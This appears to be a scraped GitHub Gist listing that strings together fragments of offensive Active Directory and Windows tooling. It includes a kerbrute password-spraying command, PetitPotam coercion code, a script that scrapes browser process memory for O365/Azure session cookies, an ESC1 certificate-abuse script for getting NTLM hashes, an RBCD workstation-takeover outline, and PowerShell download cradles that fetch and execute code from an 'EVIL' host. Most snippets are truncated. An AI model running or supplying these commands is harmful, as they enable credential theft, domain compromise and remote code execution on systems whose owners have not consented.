With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
D4rkz3rO
rvrsh3ll
/ Invoke-WMItoSMB.ps1
Last active
April 28, 2021 12:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SMBShellcodeLoad { | |
| <# | |
| .SYNOPSIS | |
| Short description | |
| .DESCRIPTION | |
| Long description | |
| .EXAMPLE | |
| An example |
milo2012
/ sniffCert.py
Created
September 27, 2018 04:17
Sniff and extract server SSL certificate of wireless access point (EAP)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ''' | |
| $ python sniffCert.py -h | |
| Usage: sniffCert.py [options] | |
| Options: | |
| -h, --help show this help message and exit | |
| -i INTERFACENO Interface to sniff | |
| $ python sniffCert.py -i en0 |
leechristensen
/ PetitPotam.ps1
Created
July 30, 2021 21:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install-Module NtObjectManager | |
| Import-Module NtObjectManager | |
| $Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
| -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
| $EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
| $client = Get-RpcClient -Server $EfsInterace | |
| $client.Connect() |
gladiatx0r
/ kerberos_attacks_cheatsheet.md
Created
September 18, 2021 02:04
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
LuemmelSec
/ Process_String_Extractor.ps1
Created
May 9, 2023 07:48
A wrapper for strings2.exe to extract sensitive info out of processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This scriplet relies on https://github.com/glmcdona/strings2 | |
| # Import the script: PS> import-module .\Process_String_Extractor.ps1 | |
| # Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World" | |
| # To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie" | |
| function ScrapeProcessMemory { | |
| Param( | |
| [Parameter(Mandatory)] | |
| [string]$Processname, | |
| [Parameter(Mandatory)] |
b4cktr4ck2
/ esc1.ps1
Created
February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
gladiatx0r
/ Workstation-Takeover.md
Last active
March 7, 2024 21:57
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |